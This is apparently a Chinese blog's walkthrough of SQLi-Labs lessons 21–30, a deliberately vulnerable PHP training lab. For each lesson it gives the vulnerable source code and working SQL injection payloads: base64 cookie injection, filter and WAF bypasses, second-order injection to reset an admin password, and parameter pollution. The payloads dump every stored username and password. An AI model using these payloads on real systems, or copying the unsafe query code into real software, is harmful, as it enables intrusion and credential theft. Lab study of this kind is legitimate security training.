SQLI-LAB 的 实战记录(Less 21 - Less 30)

  • Less - 21 Cookie Injection- Error Based- complex - string
    • Test
    • Sourse Code
    • Solution
  • Less - 22 Cookie Injection- Error Based- Double Quotes - string
    • Test
    • Sourse Code
    • Solution
  • Less - 23 Error Based- no comments
    • Test
    • Sourse Code
    • Solution
  • Less - 24 Second Degree Injections
    • Test
    • Sourse Code
    • Solution
  • Less - 25 Trick with OR AND
    • Test
    • Sourse Code
    • Solution
  • Less - 25a Trick with OR AND Blind
    • Test
    • Sourse Code
    • Solution
  • Less - 26 Trick with comments
    • Test
    • Sourse Code
    • Solution
  • Less - 26a Trick with comments
    • Test
    • Sourse Code
    • Solution
  • Less - 27 Trick with SELECT UNION
    • Test
    • Sourse Code
    • Solution
  • Less - 27a Trick with SELECT UNION
    • Test
    • Sourse Code
    • Solution
  • Less - 28 Trick with SELECT UNION
    • Test
    • Sourse Code
    • Solution
  • Less - 28a Trick with SELECT UNION
    • Test
    • Sourse Code
    • Solution
  • Less - 29 Protection with WAF
    • Test
    • Sourse Code
    • Solution
  • Less - 30 Protection with WAF
    • Test
    • Sourse Code
    • Solution

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 21 Cookie Injection- Error Based- complex - string

(第21节:cookie注入 – 基于错误 – 复杂 - 字符串)

Test:

    http://localhost/sqli-lab/Less-21/index.php
        uname=Dumb&passwd=Dumb&submit=Submit

YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
注: RHVtYg== 是 Dumb 经Base64加密后的值(密文后两位或一位 等于号 的 就可以考虑 Base64)
Base64编码/解码器 在线解码

    RHVtYlw=

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”Dumb\’) LIMIT 0,1’ at line 1
注: RHVtYlw= 是cookie中uname的值,明文 Dumb\
可以断定uname是有 一层单引号和一层括号 包裹

Sourse Code:

无cookie时 登录部分
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
    setcookie('uname', base64_encode($row1['username']), time()+3600);   
    print_r(mysql_error());           
    echo '';
}else{
    print_r(mysql_error());
    echo '';   
}

有cookie时 登录部分:

$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];           
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
     die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];    
     echo 'Your Password:' .$row['password'];
     echo 'Your ID:' .$row['id'];
} else{
     echo '';
}

Solution:

') or 1=1 #
Jykgb3IgMT0xICM=

其它:

JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSw2IG9yIDE9MSAj
明文   ') union select 1,database(),6 or 1=1 #

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
明文   ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgICM=
明文   ') union select 1,group_concat(username),group_concat(password) from security.users  #

注:以上均为cookie中uname的值

Less - 22 Cookie Injection- Error Based- Double Quotes - string

(第22节:cookie注入 – 基于错误 – 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-21/index.php
        uname=Dumb&passwd=Dumb&submit=Submit
    RHVtYlw=

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“Dumb\” LIMIT 0,1’ at line 1
注: RHVtYlw= 是cookie中uname的值,明文 Dumb\
可以断定uname是有 一层双引号 包裹

Sourse Code:

无cookie登录时:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1) {
    setcookie('uname', base64_encode($row1['username']), time()+3600);   
    print_r(mysql_error());           
    echo '';
}else{
    print_r(mysql_error());
    echo '';   
}
有cookie登录时:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;  
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];                  
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
     die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];     
     echo 'Your Password:' .$row['password'];
     echo 'Your ID:' .$row['id'];
} else{
    echo '';
}

Solution:

IiBvciAxPTEgIw==
明文   " or 1=1 #

其它:

IiB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDYgb3IgMT0xICM=
明文   " union select 1,database(),6 or 1=1 #

IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
明文   " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUpLGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyAgIw==
明文   " union select 1,group_concat(username),group_concat(password) from security.users  #

注:以上均为cookie中uname的值

Less - 23 Error Based- no comments

(第23节: 基于错误 – 无评论)

Test:

    http://localhost/sqli-lab/Less-23/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”2” LIMIT 0,1’ at line 1
注:能推断出 $id 周围是单引号

Sourse Code:

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    '  or '1' = '
    http://localhost/sqli-lab/Less-23/index.php?id='  or '1' = '

    其它:
    http://localhost/sqli-lab/Less-23/index.php?id='  union select 1,version(),3 or '1' = '

    http://localhost/sqli-lab/Less-23/index.php?id='  union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

Less - 24 Second Degree Injections

(第24节:二次注入)

Test:

    http://localhost/sqli-lab/Less-24/index.php
        username=wolf  password=1111

注:因为sqli-lab出的时间比较早,所用的php版本也比较早(可能是5.2),其中用到的一些函数已被废除,所以需要修改成类似的。

Sourse Code:

login_create.php
     $link = mysqli_connect('localhost', 'root', '', 'security');
     $username=  mysqli_real_escape_string($link,$_POST['username']) ;
     $pass= mysqli_real_escape_string($link,$_POST['password']);
     $re_pass= mysqli_real_escape_string($link,$_POST['re_password']); 

     $sql = "insert into users (username, password) values(\"$username\", \"$pass\")";

login.php
   $link = mysqli_connect('localhost', 'root', '', 'security');
   $username = mysqli_real_escape_string($link,$_POST["login_user"]);
   $password = mysqli_real_escape_string($link,$_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

Solution:

    username=admin" #  password=1111
     重置密码 改 1111 到 任意(比如666)
    username=admin  password=666 即可

Less - 25 Trick with OR & AND

(第25节:用 OR 和 AND 欺骗)

Test:

    http://localhost/sqli-lab/Less-25/index.php?id=1' #

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” LIMIT 0,1’ at line 1
注:id周围是单引号

    http://localhost/sqli-lab/Less-25/index.php?id=1' --+

注:无报错

Sourse Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);
    $id= preg_replace('/AND/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
     print_r(mysql_error());
}

注:and和or会被过滤,有报错,$id被单引号包围

Solution:

    http://localhost/sqli-lab/Less-25/index.php?id=0' oorr 1=1 --+

    http://localhost/sqli-lab/Less-25/index.php?id=2' aandnd 1=1 --+

    其它:

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,version(),database()--+

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+

注:过滤了and和or,但只有一次,所以多重复就好

Less - 25a Trick with OR & AND Blind

(第25节a:用 OR 和 AND 欺骗 与盲注)

Test:

    http://localhost/sqli-lab/Less-25a/index.php?id=1
    http://localhost/sqli-lab/Less-25a/index.php?id=2'
    http://localhost/sqli-lab/Less-25a/index.php?id=2"
    http://localhost/sqli-lab/Less-25a/index.php?id=2 oorr 1=1 #

注:id 周围没有符号 有 or 和 and 过滤

Sourse Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);
    $id= preg_replace('/AND/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

注:and和or会被过滤,无报错

Solution:

    http://localhost/sqli-lab/Less-25a/index.php?id=0 oorr 1=1 --+

    http://localhost/sqli-lab/Less-25a/index.php?id=2 aandnd 1=1 --+

     其它:

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+

Less - 26 Trick with comments

(第26节:用 评论 欺骗)

Test:

     http://localhost/sqli-lab/Less-26/index.php?id=0'")And AND and  or OR select union  /// #--/*+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”)selectunion’ LIMIT 0,1’ at line 1
注:id周围只有单引号,过滤得只剩”)selectunion

Sourse Code:

function blacklist($id) {
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{  
     print_r(mysql_error());
}

注:$id 周围是单引号,过滤了 or,and , /* , – , # , 空格 , /

Solution:

    http://localhost/sqli-lab/Less-26/index.php?id=1'%26%26'1

    其它:

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0UNION%A0SELECT%A01,version(),database()%26%26%a0'1

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0'1

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1

注:用%A0替代空格使用,用&&(%26%26)替代AND使用

Less - 26a Trick with comments

(第26a节:用 评论 欺骗)

Test:

    http://localhost/sqli-lab/Less-26a/index.php?id=1')")And AND and  or OR select union  /// #--/*+

注:被过滤得只剩’)”)selectunion 无sql查询报错

     http://localhost/sqli-lab/Less-26a/index.php?id=1'%A0%26%26%A0 '1'='1

     http://localhost/sqli-lab/Less-26a/index.php?id=1"%A0%26%26%A0 "1"="1

     http://localhost/sqli-lab/Less-26a/index.php?id=1")%A0%26%26%A0 ("1")=("1

注:都不报错,不知道格式是什么

    http://localhost/sqli-lab/Less-26a/index.php?id=0'%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0'1

注:都有php的报错,可能格式错了,查询不到

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1

注:这次对了

Sourse Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

注:$id 周围是单引号和括号,过滤了 or,and , /* , – , # , 空格 , /

Solution:

    http://localhost/sqli-lab/Less-26a/index.php?id=1')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1

    其它:

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,version(),database()%26%26%a0('1

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0('1

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0('1

Less - 27 Trick with SELECT & UNION

(第27节:用 UNION 和 SELECT 欺骗)

Test:

    http://localhost/sqli-lab/Less-27/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”)AndANDandorOROror’ LIMIT 0,1’ at line 1
注:Id的周围是单引号,会过滤union和select及有注释作用的符号

Sourse Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);       //strip out /*
    $id= preg_replace('/[--]/',"", $id);          //Strip out --.
    $id= preg_replace('/[#]/',"", $id);           //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.
    $id= preg_replace('/select/m',"", $id);   //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.
    $id= preg_replace('/union/s',"", $id);    //Strip out union
    $id= preg_replace('/select/s',"", $id);    //Strip out select
    $id= preg_replace('/UNION/s',"", $id);  //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);   //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);     //Strip out Union
    $id= preg_replace('/Select/s',"", $id);     //Strip out select
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
     print_r(mysql_error());  
}

Solution:

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0or(1)=(1)%26%26%a0'1

    其它:

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0'1

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0'1

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1

Less - 27a Trick with SELECT & UNION

(第27a节:用 UNION 和 SELECT 欺骗)

Test:

    http://localhost/sqli-lab/Less-27a/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+

注:无sql查询报错,过滤后还剩 0’”)AndANDandorOROror

Sourse Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --.
    $id= preg_replace('/[#]/',"", $id);            //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
    $id= preg_replace('/select/m',"", $id);        //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
    $id= preg_replace('/union/s',"", $id);        //Strip out union
    $id= preg_replace('/select/s',"", $id);        //Strip out select
    $id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);        //Strip out Union
    $id= preg_replace('/Select/s',"", $id);        //Strip out Select
    return $id;
}
$id= blacklist($id);
$hint=$id;
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

Solution:

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0or(1)=(1)%26%26%a0"1

    其它:

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0"1

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1

Less - 28 Trick with SELECT & UNION

(第28节:用 UNION 和 SELECT 欺骗 )

Test:

    http://localhost/sqli-lab/Less-28/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+

注: 过滤了union空格select 这种组合与全部空格,无sql查询报错

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect

注:UnIon%A0SeLect 中间不是空格了,没被过滤

    http://localhost/sqli-lab/Less-28/index.php?id=0'%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0'

注:有php报错

     http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('

注:这个对了,说明id周围是单引号和括号

Sourse Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
    $id= preg_replace('/[--]/',"", $id);                //Strip out --.
    $id= preg_replace('/[#]/',"", $id);                    //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
    $id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
}

Solution:

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('

    其它:

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0('1

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0('1

Less - 28a Trick with SELECT & UNION

(第28节a:用 UNION 和 SELECT 欺骗 )

Test:

    http://localhost/sqli-lab/Less-28a/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select  /// #--?/*+
注: 过滤了union空格select 这种组合,无sql查询报错
    http://localhost/sqli-lab/Less-28a/index.php?id=1') --
注: 正常显示,没过滤空格和有注释作用的符号

Sourse Code:

function blacklist($id){
    $id= preg_replace('/union\s+select/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{  
}

Solution:

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,2,3--+

    其它:

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,version(),database()--+

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(username),group_concat(password) from security.users where 1--+

Less - 29 Protection with WAF

(第29节:用WAF防护)

Test:

    http://localhost/sqli-lab/Less-29/login.php?id=0' union select 1,2,3 --+

注:被检测到有问题,跳转到其他的页面了

Sourse Code:

login.php
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    }else {   
        header('Location: hacked.php');
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
    foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            echo "
"
; break; } } } $qs = $_SERVER['QUERY_STRING']; $hint=$qs; $id1=java_implimentation($qs); $id=$_GET['id']; whitelist($id1); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password']; } else{ print_r(mysql_error()); }

Solution:

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,2,3 --+

    其它:

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 30 Protection with WAF

(第30节:用WAF防护)

Test:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=6

注:显示的是id为6的内容

Sourse Code:

$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
      echo 'Your Login name:'. $row['username'];
      echo 'Your Password:' .$row['password'];
} else{
    print_r(mysql_error());
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    } else {   
        header('Location: hacked.php');
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
     foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            break;
        }
    }
}

Solution:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,2,3 --+

    其它:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

你可能感兴趣的:(sql注入)